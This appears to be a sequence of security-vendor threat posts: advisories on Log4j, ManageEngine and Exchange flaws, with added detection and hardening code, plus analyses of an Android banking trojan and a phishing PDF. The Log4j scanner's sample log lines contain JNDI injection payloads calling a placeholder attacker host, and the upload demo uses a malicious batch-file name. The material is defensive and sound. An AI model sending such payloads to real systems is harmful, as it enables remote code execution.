
Apache Log4j Remote Code Execution Vulnerability

Overview:

Apache Log4j is a Java-based logging utility that can be configured through a configuration file or through Java code. Apache Log4j provides many features, such as reliability, extensibility, multiple configuration support including xml/json/yaml, excellent performance and more.

A JNDI Injection vulnerability has been reported in the JndiManager class of Apache Log4j. This vulnerability is due to improper handling of logged messages.

A remote, unauthenticated attacker who can control log message contents can exploit this vulnerability by sending a specially crafted parameter to the target application. Successful exploitation results in information disclosure or remote code execution.

CVE Reference:

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-44228.

Common Vulnerability Scoring System (CVSS):

The overall CVSS score is 9.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:F/RL:O/RC:C).

Base score is 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:

  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is changed.
  • Impact of this vulnerability on data confidentiality is high.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is high.

Temporal score is 9.3 (E:F/RL:O/RC:C), based on the following metrics:

  • The exploit code maturity level of this vulnerability is functional.
  • The remediation level of this vulnerability is official fix.
  • The report confidence level of this vulnerability is confirmed.

Technical Overview:

The Java Naming and Directory Interface (JNDI) is a Java API for directory services that allows Java clients to discover and look up data and resources (in the form of Java objects) by name. JNDI supports many services, including the Lightweight Directory Access Protocol (LDAP), the Domain Name Service (DNS) and others. Apache Log4j supports performing many kinds of lookups, including JNDI lookups.

The JNDI lookup feature in vulnerable versions of Apache Log4j 2.x allows values to be inserted at arbitrary places in the Log4j configuration. Log4j has a special syntax of the form ${lookup_name:key} (where lookup_name is one of the available lookups and key is the attribute to be evaluated). When an attacker includes the string ${ in a request, Log4j attempts to write it into the log data; while doing so, the lookup method is called, which finds the string after ${ and attempts to replace it with the actual value. For instance, ${env:COMPUTERNAME} becomes the actual computer name (e.g. TEST-PC) and ${env:AWS_ACCESS_KEY_ID} becomes the actual AWS key value.

JNDI lookups are enabled by default in the vulnerable versions of Log4j 2.x, and the inputs are not sanitized, which allows attackers to send maliciously crafted requests to a web server or application that uses Log4j. The application then responds with the evaluated strings.

The majority of attacks use the LDAP protocol, as in the publicly available POCs, but attackers are also trying to leverage other protocols such as RMI, LDAPS, HTTP(S), DNS, IIOP, CORBA, NIS and NDS. Payloads are found in different sections of the HTTP request, such as the URI, parameters, headers such as User-Agent and Referer, and the request body, since attackers try to get the payload logged by any means so that it is parsed by the vulnerable Log4j.

This vulnerability has become the most widely exploited in-the-wild vulnerability in recent times. We are seeing a wide range of payload mutations as attackers try to evade the protection or detection in place, for example base64-encoded data. SonicWall has released multiple signatures to protect its customers.
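
The following is an added detection example for the lookup syntax and request locations described above; it is not SonicWall's signature logic or code from the post. It goes one step beyond the plain ${jndi:...} form by collapsing the nested lower/upper/default lookups that the payload mutations mentioned above rely on; the log lines and the host attacker.example are constructed placeholders.

```python
"""Scan request/log text for Log4j ${jndi:...} lookups (CVE-2021-44228).

Added detection example for this post; it is not SonicWall's signature
logic. SAMPLE_LINES are constructed, and attacker.example is a placeholder."""
import re
from typing import List, Tuple
from urllib.parse import unquote

# Protocols the post reports being abused through the JNDI lookup.
JNDI_SCHEMES = {"ldap", "ldaps", "rmi", "dns", "http", "https",
                "iiop", "corba", "nis", "nds"}

# An innermost ${...} lookup: its body contains no further "${" or "}".
INNER_LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")
# A plain JNDI lookup with its scheme, e.g. ${jndi:ldap://...}.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def _resolve_inner(match: "re.Match[str]") -> str:
    """Evaluate the lookups attackers nest purely to change how the text
    looks: ${name:-default} (Log4j substitutes the default when the name
    cannot be resolved) and ${lower:x}/${upper:x}. Everything else,
    including ${jndi:...} itself, is left untouched."""
    body = match.group(1)
    if ":-" in body:
        return body.split(":-", 1)[1]
    name, sep, value = body.partition(":")
    if sep and name.strip().lower() == "lower":
        return value.lower()
    if sep and name.strip().lower() == "upper":
        return value.upper()
    return match.group(0)


def normalize(text: str, max_rounds: int = 10) -> str:
    """URL-decode once (payloads arrive in URIs and parameters), then
    collapse nested lookups from the inside out until nothing changes."""
    text = unquote(text)
    for _ in range(max_rounds):
        collapsed = INNER_LOOKUP_RE.sub(_resolve_inner, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def find_jndi(text: str) -> List[str]:
    """Lower-cased scheme of every ${jndi:<scheme>:...} after normalization."""
    return [m.group(1).lower() for m in JNDI_RE.finditer(normalize(text))]


def lookup_names(text: str) -> List[str]:
    """Names of all lookups in the raw text (env, jndi, lower, ...): useful
    because the post shows ${env:...} leaking secrets without any JNDI."""
    return [m.group(1).partition(":")[0].strip().lower()
            for m in INNER_LOOKUP_RE.finditer(unquote(text))]


def scan_log_lines(lines: List[str]) -> List[Tuple[int, List[str], bool]]:
    """(line number, schemes, any scheme known to be abused) per flagged line."""
    hits = []
    for number, line in enumerate(lines, 1):
        schemes = find_jndi(line)
        if schemes:
            hits.append((number, schemes, any(s in JNDI_SCHEMES for s in schemes)))
    return hits


# Constructed access-log lines covering the request locations the post lists
# (URI, parameters, User-Agent); attacker.example is a placeholder host.
SAMPLE_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.6 - - "GET /login?user=${jndi:ldap://attacker.example/a} HTTP/1.1" 200',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:rmi}://attacker.example/x}"',
    '10.0.0.8 - - "GET /%24%7Bjndi%3Adns%3A%2F%2Fattacker.example%2Fz%7D HTTP/1.1" 404',
    '10.0.0.9 - - "GET /?s=${env:COMPUTERNAME} HTTP/1.1" 200',
]

if __name__ == "__main__":
    for number, schemes, known in scan_log_lines(SAMPLE_LINES):
        print(f"line {number}: jndi scheme(s) {schemes}, known-abused={known}")
```

Lines 2 to 4 of the sample are flagged (schemes ldap, rmi and dns); line 5 carries no JNDI lookup but lookup_names() still reports its env lookup.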

Triggering the Problem:

  • The target must be running a vulnerable version of the software.
  • The attacker must have network connectivity to the vulnerable server.

Triggering Conditions:

The attacker sends a maliciously crafted parameter to the vulnerable server. The server logs the parameter using Log4j. The vulnerability is triggered when the server parses the JNDI lookup included in the log message.

SonicWall Capture Labs Threat Research is aware of the vulnerability in the Log4j Java-based logging library and has released the following IPS signatures to detect exploitation attempts related to CVE-2021-44228:

  • IPS: 2307 Apache Log4j2 JNDI Log Messages Remote Code Execution
  • IPS: 2067 Apache Log4j2 JNDI Log Messages Remote Code Execution LDAPS
  • IPS: 15732 Apache Log4j2 JNDI Log Messages Remote Code Execution NIS
  • IPS: 15733 Log4j2 JNDI Log Messages Remote Code Execution NDS
  • IPS: 15734 Apache Log4j2 JNDI Log Messages Remote Code Execution COBRA
  • IPS: 15735 Apache Log4j2 JNDI Log Messages Remote Code Execution RMI
  • IPS: 15736 Apache Log4j2 JNDI Log Messages Remote Code Execution IIOP
  • IPS: 15737 Apache Log4j2 JNDI Log Messages Remote Code Execution DNS 2
  • IPS: 2311 Apache Log4j2 JNDI Log Messages Remote Code Execution HTTP
  • IPS: 2315 Apache Log4j2 JNDI Log Messages Remote Code Execution DNS
  • IPS: 2328 Apache Log4j2 JNDI Log Messages Remote Code Execution HTTPS

Please note that if your web service/server is accessible over HTTPS, then Server DPI-SSL must be enabled for the above signatures to detect exploits targeting this vulnerability.

SonicWall’s Web Application Firewall (WAF) provides protection against this threat:

  • WAF: 1116 Apache Log4j2 JNDI Log Messages Remote Code Execution

Remediation Details:

The risks posed by this vulnerability can be mitigated or eliminated by:

  • Enabling the above-mentioned IPS signatures on SonicWall firewalls.
  • Enabling the Web Application Firewall signature above.
  • Updating to a non-vulnerable version of the product or applying the vendor-supplied patch.
  • Removing the JndiLookup class from the classpath.
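
An added example for the last remediation item, written here and not vendor tooling: it inventories a directory of jars for the JndiLookup class and writes a copy with that entry removed. The jars it scans in the demo are constructed stand-ins built in a temporary directory (the entry name org/apache/logging/log4j/core/lookup/JndiLookup.class is the real one); point scan_classpath() at a real lib directory to use it.

```python
"""Find and strip JndiLookup.class in Log4j jars (the classpath mitigation).

Added example for the remediation list above, not vendor tooling. It builds
constructed stand-in jars in a temporary directory so it runs offline; point
scan_classpath() at a real lib directory to use it."""
import os
import tempfile
import zipfile
from typing import Dict

# Entry name of the vulnerable lookup class inside log4j-core.
JNDI_LOOKUP_ENTRY = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def jar_has_jndi_lookup(path: str) -> bool:
    """True when the jar (a zip archive) still contains JndiLookup.class.
    Unreadable or missing files count as "not found" rather than crashing."""
    try:
        with zipfile.ZipFile(path) as jar:
            return JNDI_LOOKUP_ENTRY in jar.namelist()
    except (zipfile.BadZipFile, OSError):
        return False


def remove_jndi_lookup(src: str, dst: str) -> bool:
    """Write a copy of src to dst without JndiLookup.class; returns whether
    the entry was actually present and dropped. Other entries and their
    metadata are copied unchanged."""
    dropped = False
    with zipfile.ZipFile(src) as zin, zipfile.ZipFile(dst, "w") as zout:
        for info in zin.infolist():
            if info.filename == JNDI_LOOKUP_ENTRY:
                dropped = True
                continue
            zout.writestr(info, zin.read(info.filename))
    return dropped


def scan_classpath(root: str) -> Dict[str, bool]:
    """Map each *.jar under root (path relative to root, '/'-separated) to
    whether it still carries JndiLookup.class."""
    result: Dict[str, bool] = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".jar"):
                full = os.path.join(dirpath, name)
                key = os.path.relpath(full, root).replace(os.sep, "/")
                result[key] = jar_has_jndi_lookup(full)
    return dict(sorted(result.items()))


def make_demo_jar(path: str, with_jndi: bool) -> None:
    """Constructed stand-in jar: a manifest, an unrelated lookup class and,
    optionally, a dummy JndiLookup.class entry. Not a real Log4j build."""
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        jar.writestr("org/apache/logging/log4j/core/lookup/StrLookup.class",
                     b"\xca\xfe\xba\xbe")
        if with_jndi:
            jar.writestr(JNDI_LOOKUP_ENTRY, b"\xca\xfe\xba\xbe")


def demo() -> Dict[str, bool]:
    """Create one vulnerable and one clean demo jar, strip the vulnerable one
    into a third file, and return the classpath scan over all three."""
    root = tempfile.mkdtemp(prefix="log4j-demo-")
    lib = os.path.join(root, "lib")
    os.makedirs(lib)
    vulnerable = os.path.join(lib, "log4j-core-demo.jar")
    make_demo_jar(vulnerable, with_jndi=True)
    make_demo_jar(os.path.join(lib, "other-library.jar"), with_jndi=False)
    remove_jndi_lookup(vulnerable, os.path.join(lib, "log4j-core-demo-stripped.jar"))
    return scan_classpath(root)


if __name__ == "__main__":
    for jar, still_vulnerable in demo().items():
        print(f"{jar}: {'still has JndiLookup' if still_vulnerable else 'ok'}")
```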

The vendor has released the following advisory regarding this vulnerability:
Vendor Advisory

Zoho ManageEngine Arbitrary File Upload Vulnerability

Overview:

  ManageEngine ServiceDesk is an IT help desk platform that provides functionality to manage various aspects of an IT environment such as changes, incidents and assets, and also incorporates a standard ITIL framework. ManageEngine SupportCenter Plus is web-based customer support software that lets organizations effectively manage customer tickets, their account and contact information, and service contracts. The code and features of these two applications are extensively shared.

  An arbitrary file upload vulnerability has been reported in Zoho ManageEngine ServiceDesk Plus, ServiceDesk Plus MSP, and SupportCenter Plus. The vulnerability is due to an unspecified flaw related to the /RestAPI URLs in a servlet, and ImportTechnicians in the Struts configuration.

  A remote attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could allow the attacker to execute arbitrary code with privileges of SYSTEM.

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-44077.

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.7 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.7 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

Technical Overview:

  ManageEngine ServiceDesk/SupportCenter include features for configuring technician information. The IT help desk team comprises the help desk team manager, help desk agents, and technicians who handle the requests posted or raised by various requesters from different accounts. A user can add, edit, or remove technicians in the application and also grant them the access privileges that suit their role and needs. A user can also view the list of technicians in a particular account and/or site by selecting the account from the Accounts combo box and the site from the Technicians for combo box. The feature relevant to understanding this vulnerability is importing technician information from a comma-separated (CSV) file into the application. Note that this is a legacy feature that is no longer available in either the unpatched (at least in the versions 11012 and 11012) or the patched version of the SupportCenter Plus application.

  This feature is accessible via the Apache Struts action ImportTechnicians defined in struts-config.xml, which is mapped to the request URL “/RestAPI/ImportTechnicians”. An unrestricted arbitrary file upload vulnerability exists in the ManageEngine ServiceDesk Plus, ServiceDesk Plus MSP and SupportCenter Plus products. The vulnerability is due to improper validation of the filename parameter.

  When the user sends a POST request to /RestAPI/ImportTechnicians with a Content-Type header of multipart/form-data, the execute method of the class com.adventnet.servicedesk.setup.action.ImportTechniciansAction is eventually called. The execute method uses the value of the filename attribute of the Content-Disposition header in the request body to write the contents of the file into the “\SupportCenterPlus\bin” or “\ServiceDesk\bin” directory (depending on the specific ManageEngine product).

  The uploaded file is not checked for the expected file extension, “.csv”. Note that directory traversal is not possible, because the Java classes org.apache.struts.upload.CommonsMultipartRequestHandler and org.apache.struts.upload.CommonsMultipartRequestHandler.CommonsFormFile from struts.core-1.3.11.jar are used by the application to remove all characters before the last ‘/’ or ‘\’ character from the filename parameter before the vulnerable code in com.adventnet.servicedesk.setup.action.ImportTechniciansAction is reached.

  A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the ImportTechnicians action to write or overwrite arbitrary files in the “\SupportCenterPlus\bin” or “\ServiceDesk\bin” directory (depending on the specific ManageEngine product). For instance, an attacker can overwrite the file jreCorrector.bat in this directory. This batch file is executed by the wrapper.exe executable during startup of the product, and also during its shutdown. In addition, ManageEngine ServiceDesk/SupportCenter products are by default started automatically as a Windows service during Windows startup (or after a Windows restart). Therefore, successful exploitation could result in arbitrary code execution with SYSTEM-level privileges.
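
The following is an added example contrasting the filename handling described above with a hardened version; it is not ManageEngine's or Struts' code. The multipart body, boundary and the POSIX-form UPLOAD_DIR are constructed for the demo, struts_basename() mirrors only the path-stripping behaviour the text attributes to CommonsMultipartRequestHandler, and hardened_target_path() adds the extension check the text says is missing.

```python
"""Vulnerable vs hardened handling of the multipart filename parameter.

Added example, not ManageEngine's code. The request body is constructed,
struts_basename() mirrors only the path-stripping behaviour the text
attributes to Struts, and hardened_target_path() adds the extension check
the text says is missing. UPLOAD_DIR is written in POSIX form for the demo."""
import re
from typing import Dict, Optional, Tuple

UPLOAD_DIR = "ServiceDesk/bin"          # stands in for \ServiceDesk\bin
BOUNDARY = "----constructed-boundary"   # constructed multipart boundary

# Only a plain name with a single ".csv" extension is acceptable.
SAFE_CSV_NAME = re.compile(r"[A-Za-z0-9_-]{1,100}\.csv", re.IGNORECASE)
CONTENT_DISPOSITION_FILENAME = re.compile(r'filename="([^"]*)"')


def struts_basename(name: str) -> str:
    """Keep what follows the last '/' or '\\', as the text says
    CommonsMultipartRequestHandler does. This blocks traversal but says
    nothing about what kind of file is being written."""
    cut = max(name.rfind("/"), name.rfind("\\"))
    return name[cut + 1:]


def vulnerable_target_path(filename: str) -> str:
    """Unpatched behaviour as described: write whatever basename arrived."""
    return f"{UPLOAD_DIR}/{struts_basename(filename)}"


def hardened_target_path(filename: str) -> Optional[str]:
    """Accept only a plain .csv name; None means the upload is refused."""
    base = struts_basename(filename)
    if not SAFE_CSV_NAME.fullmatch(base):
        return None
    return f"{UPLOAD_DIR}/{base}"


def build_multipart(filename: str, content: str) -> str:
    """Constructed single-part multipart/form-data body."""
    return (f"--{BOUNDARY}\r\n"
            f'Content-Disposition: form-data; name="file"; filename="{filename}"\r\n'
            "Content-Type: text/csv\r\n\r\n"
            f"{content}\r\n--{BOUNDARY}--\r\n")


def parse_single_part(body: str) -> Tuple[Optional[str], str]:
    """Return (filename, content) from a one-part body built as above."""
    part = body.split(f"--{BOUNDARY}\r\n", 1)[1].split(f"\r\n--{BOUNDARY}--", 1)[0]
    headers, _, content = part.partition("\r\n\r\n")
    match = CONTENT_DISPOSITION_FILENAME.search(headers)
    return (match.group(1) if match else None), content


def evaluate(body: str) -> Dict[str, Optional[str]]:
    """Where the vulnerable and hardened handlers would write this upload."""
    filename, _ = parse_single_part(body)
    if filename is None:
        return {"filename": None, "vulnerable": None, "hardened": None}
    return {"filename": filename,
            "vulnerable": vulnerable_target_path(filename),
            "hardened": hardened_target_path(filename)}


if __name__ == "__main__":
    # The second name is the batch file the post says an attacker would overwrite.
    for name in ("technicians.csv", "..\\..\\jreCorrector.bat"):
        print(evaluate(build_multipart(name, "constructed,content")))
```

The traversal prefix is stripped in both handlers, as the text describes, but only the hardened handler refuses to write the .bat file.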

Triggering the Problem:

  • The target must be running a vulnerable version of the software.
  • The attacker must have network connectivity to the target server.

Triggering Conditions:

  The attacker sends a request to the vulnerable servlet on the target server. The vulnerability is triggered when the server processes the request.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP, over port 8080/TCP

SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 2302 ManageEngine Products ImportTechnicians Arbitrary File Creation

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Restricting access to the affected communication port to trusted hosts only.
    • Upgrading to a non-vulnerable version of the product when available.
    • Detecting and blocking malicious traffic using the signature above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory 1
  Vendor Advisory – ServiceDesk Plus MSP
  Vendor Advisory 2
  Vendor Advisory – ServiceDesk Plus
  Vendor Advisory 3

Feature rich Android banker masquerades as DHL parcel tracking app and uses Telegram API as a means of communication

SonicWall Threats Research team observed Android malware masquerading as a DHL app. This app is (at the time of writing) actively hosted on hxxp://dhl-getnextalert.duckdns.org and is downloaded as DHL.apk:

Application analysis

Android apk specifics:

The app requests a number of permissions, but some of them stand out when it comes to user privacy:

  • CALL_PHONE
  • SHUTDOWN
  • WAKE_LOCK
  • RECEIVE_SMS
  • READ_SMS
  • SEND_SMS
  • REQUEST_IGNORE_BATTERY_OPTIMIZATIONS
  • MODIFY_AUDIO_SETTINGS
  • READ_CONTACTS
  • WRITE_CALL_LOG
  • READ_CALL_LOG
  • WRITE_CONTACTS
  • REQUEST_DELETE_PACKAGES
  • RECEIVE_BOOT_COMPLETED
  • FOREGROUND_SERVICE

A vigilant user should take a step back and consider whether an app that claims to be a package delivery app like DHL needs permission to shut down a mobile device.

Once installed, the application requests accessibility permissions from the victim:

The malware shows a lengthy explanation to the user for granting the accessibility service:

Capabilities

This malware is well equipped to perform a number of operations; some of its capabilities include:

  • Dump SMS, call logs, contacts
  • Send SMS to all contacts (Can be used to spread to other devices)
  • Show a list of installed apps
  • Install and uninstall apps
  • Disable Google Play Protect
  • Open URL in browser
  • Forward SMS to Telegram Bot
  • Inject pages on the device (Can be used for phishing)
  • Read all notifications (Can be used to steal OTP)
  • Steal Google Authenticator codes
  • Steal Wifi password, credit card details
  • Hide app icon (Makes the malware stealthy)

Some of these capabilities are highlighted below:

  • The malware extracts and sends identifiers for the infected device, which include:
    • Brand
    • Model
    • Version
    • Serial

  • The malware can forward SMS messages that are received on the device to the attacker:

  • The malware is capable of communicating with the attacker via Telegram:

  • The malware is capable of stealing Google Authenticator information:

  • The malware can monitor notifications that are displayed on the device. This trick can be used to steal OTP codes that are received by the victim:

Network Communication

Once the malware is executed on the device, it communicates with the attacker using Telegram. It reports the infection by announcing that a new device has installed the malware:

It sends the details of the infected device:

One of the network exchanges involves sending a list of commands that the malware supports:

Network investigation

The domain name includes dhl, which indicates that this domain was created to spread DHL-themed malware/threats. The VirusTotal graph gives more information about the connections between this domain and other malicious domains:

As can be seen, there are a number of other malicious links hosted on duckdns.org with themes related to popular organizations. Some examples are listed below:

  • citi22bankonline.duckdns.org
  • jpmorgamrecovery.duckdns.org
  • citibank-security09.duckdns.org
  • kenzy-group87.duckdns.org
  • billoptusnet.duckdns.org
  • dhl-getnextalert.duckdns.org

A number of these domains have malicious ratings on VirusTotal.

Targets

The malware stores a huge list of application names that it targets. It can be speculated that the malware detects the presence of these targeted apps and shows corresponding fake phishing pages for them, which can be used to steal login credentials, credit card information and other valuable data. The malware stores apps belonging to the following categories, along with the number of targeted apps:

  • Cryptocurrency – 14
  • Social Media – 6
  • Mail – 8

The malware targets a number of banks from different countries. Below is a list of countries and the number of banks belonging to each country that are targeted:

  • Australia – 17
  • Canada – 4
  • Germany – 14
  • Spain – 9
  • India – 11
  • Italy – 12
  • Netherlands – 5
  • Poland – 20
  • Russia – 22
  • Turkey – 18
  • United-Kingdom – 12
  • United-States – 23

Additional observations

The app contains misspelled words like Assablity, MainActivitryLoader and Reciever, which leads us to believe that there is a chance this app was created by non-English-speaking developers:

The directory structure that is accessible on the server contains interesting indicators:

  • A few files/directories have a last-modified date of 12/04/2021
  • One of the directories has a last-modified date of 08/07/2021, so we can assume that the attackers have been working on this threat for at least the last 4 months

We found a hardcoded address at the location of the installed files on the infected device: hxxps://rikobot.xyz

In summary, this banking threat targets a large number of applications from multiple countries. It is feature rich, with a large number of capabilities under its belt, and it communicates with the attackers via Telegram bots.

SonicWall Capture Labs provides protection against this threat using the signatures listed below:

  • AndroidOS.Telegram.BK
  • AndroidOS.Telegram.BK_1

Indicators of Compromise:

  • 6a729b0ac0fd14c2c5ee97018e61705e
  • 6a9f23b83c09d90d436163af3684c45d

Some of the targeted applications that are hardcoded in this malware are:


Phishing campaigns make it facile to steal credentials

SonicWall Capture Labs Threats Research team has been detecting an ongoing phishing campaign which deceives users by pretending to be a genuine software platform, using its logo. Upon opening the PDF file, the user is shown an image with instructions on how to download the PDF invoice:

If the instructions in the PDF file are followed, a malicious URL is opened and the user is shown a genuine-looking webpage with options to select an email provider, such as Office365 and others, to view the document:

Depending on the email provider chosen by the user, one of the following forms is displayed:

Upon entering the user credentials and clicking the log-in button, the user is shown an error saying Incorrect username or password.

However, in the background the malware author steals the user credentials when the log-in button is clicked and sends them to a remote web server, using Cloudflare servers to stay anonymous, as shown below:

The PDF file is not detected by any vendor when checked on threat intelligence sharing portals such as VirusTotal:

SonicWall Capture Labs provides protection against this threat via the SonicWall Capture ATP w/RTDMI.

Indicators Of Compromise (IOC):

  • beb92babeedfc365857b1f8df2491de84c567e4fe090555cf9217a3075e1267e

Microsoft Exchange Server HandleBackEndCalculationException Vulnerability

Overview:

  Microsoft Exchange Server is an ASP.NET implementation of an email and calendaring server and is capable of handling most standard Internet protocols as well as numerous proprietary Microsoft protocols and formats. Microsoft Exchange Server provides web access for users to various components such as Outlook Web Access and Autodiscover. Autodiscover is a component that allows clients to automatically discover the Exchange settings for the client without requiring users to know specific server addresses.

  A reflected cross-site scripting vulnerability has been reported in Microsoft Exchange Server. The vulnerability is due to insufficient sanitization of incoming request parameters reflected in exception messages returned by the server.

  A remote attacker can exploit this vulnerability by enticing a target user into clicking a malicious link. Successful exploitation could result in arbitrary script execution in the target user’s browser.

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-41349.

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.6 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C).

  Base score is 9.6 (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is required.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.6 (E:P/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is proof of concept.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

Technical Overview:

  When any Exchange module receives an HTTP request, it is eventually handled by the OnPostAuthorizeInternal() method of the ProxyModule class in Microsoft.Exchange.FrontEndHttpProxy.dll. If the request is not authenticated, the SelectHandlerForUnauthenticatedRequest() method is called, which checks the value of the HttpProxy.ProtocolType property to determine which module received the request and decides which specific ProxyRequestHandler class to instantiate in order to handle it. If the request was received by the Autodiscover module (i.e. the request-URI begins with “/autodiscover”), HttpProxy.ProtocolType is set to “Autodiscover” and as a result SelectHandlerForUnauthenticatedRequest() creates an AutodiscoverProxyRequestHandler object as the handler for the request.

  Once the handler is chosen, the Run() method of the ProxyRequestHandler object is called which applies the handler to the HttpContext object for the request with the RemapHandler() method. The request is then processed with the BeginProcessRequest() method which queues a call to the BeginCalculateTargetBackEnd() method in the thread pool. BeginCalculateTargetBackEnd() calls InternalBeginCalculateTargetBackEnd() which attempts to resolve the anchor mailbox location for the request. The resolution is performed by first calling TryDirectTargetCalculation(), which returns null because this is the default method behaviour and the method is not overridden by AutodiscoverRequestHandler or any of its parent classes. InternalBeginCalculateTargetBackEnd() then calls ResolveAnchorMailbox() which is overridden in AutodiscoverRequestHandler and its parent classes EwsAutodiscoverProxyRequestHandler and BEServerCookieProxyRequestHandler.

  AutodiscoverRequestHandler.ResolveAnchorMailbox() only handles autodiscover requests with a request-URI containing “/wssecurity/x509cert” and otherwise calls EwsAutodiscoverProxyRequestHandler.ResolveAnchorMailbox(). This method inspects the request-URI to see if it corresponds to a specific type of autodiscover request. If the request path ends with “/autodiscover.json” it is considered an “autodiscover V2 preview request” and if this is the case, an explicit logon address is retrieved from the Email HTTP query, form field, or cookie value. When attempting to retrieve the value from HTML form fields, the ValidateHttpValueCollection() method is called to validate the form fields. In turn, this method calls ValidateString() on each form field.

  Each field is checked by calling System.Web.Util.RequestValidator.IsValidRequestString(), which calls System.Web.CrossSiteScriptingValidation.IsDangerousString() with the form field value. This method considers the value dangerous if it contains either (1) '<' followed by a letter, '!', '/' or '?'; or (2) the sequence "&#". If the form field value is considered dangerous, the ValidateString() method throws an HttpRequestValidationException. This exception's message contains the form field name and its truncated value.

  If an HttpRequestValidationException exception is thrown, it is caught by the method BeginCalculateTargetBackEnd() and the exception is handled by HandleBackEndCalculationException(). This exception is eventually handled by the method HandleHttpException(), which returns the exception message as the HTTP response, without encoding the message contents.
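
The following is an added model of the validation path described above and of the encoding fix; it is not Microsoft's code. is_dangerous_string() follows the two rules the text attributes to IsDangerousString(), the exception message wording and the 16-character truncation are constructed stand-ins, and the two render_* functions contrast returning the message verbatim (the flaw) with HTML-encoding it.

```python
"""Model of the request-validation path in the text and of the encoding fix.

Added example, not Microsoft's code: is_dangerous_string() follows the two
rules the post attributes to IsDangerousString(), the exception message text
and the 16-character truncation are constructed stand-ins, and the two
render_* functions contrast returning the message raw with HTML-encoding it."""
import html
from typing import Optional

ECHO_LIMIT = 16  # assumed truncation length for the value echoed in the message


def is_dangerous_string(value: str) -> bool:
    """(1) '<' followed by a letter, '!', '/' or '?', or (2) the sequence '&#'."""
    for i in range(len(value) - 1):
        if value[i] == "<" and (value[i + 1].isalpha() or value[i + 1] in "!/?"):
            return True
    return "&#" in value


def validate_form_field(name: str, value: str) -> Optional[str]:
    """Stand-in for ValidateString(): the exception message (which carries the
    field name and a truncated copy of its value) or None when the value is fine."""
    if not is_dangerous_string(value):
        return None
    shown = value if len(value) <= ECHO_LIMIT else value[:ECHO_LIMIT] + "..."
    return f'Request validation rejected form field {name}: "{shown}"'


def render_vulnerable(name: str, value: str) -> str:
    """The flaw: the exception message goes into the HTTP response verbatim."""
    message = validate_form_field(name, value)
    return message if message is not None else "OK"


def render_hardened(name: str, value: str) -> str:
    """The fix: HTML-encode anything reflected from the request."""
    message = validate_form_field(name, value)
    return html.escape(message, quote=True) if message is not None else "OK"


def reflects_markup(response: str) -> bool:
    """True when the response body still contains raw markup delimiters."""
    return "<" in response or ">" in response


if __name__ == "__main__":
    # Constructed values for the Email form field the post mentions.
    for value in ("user@example.com", "<b>not an address</b>", "&#60;"):
        print(repr(value), "->", render_hardened("Email", value))
```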

Triggering the Problem:

  • The target system must have the vulnerable product installed and running.
  • The attacker must be able to deliver a malicious URL to the target user.

Triggering Conditions:

  An attacker entices a user to open a page that redirects the user to a malicious URL. The vulnerability is triggered when the server parses the crafted request and returns a page containing injected JavaScript code to the target user’s browser.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTPS, over port 443/TCP

SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 15711 Microsoft Exchange Server Spoofing Vulnerability (CVE-2021-41349)

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Applying the vendor supplied patch resolving the vulnerability.
    • Upgrading to a version unaffected by the vulnerability.
    • Detecting and filtering malicious traffic using the signature above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

WordPress websites plagued by fake ransomware

A number of WordPress websites have been infected with what appeared to be ransomware. The infected websites show a warning on their homepage saying the site has been encrypted and listing a bitcoin address to which payment should be sent to restore the site. But further analysis found that the warning was fake and was just meant to scare the victims and extort money.

Infection details:

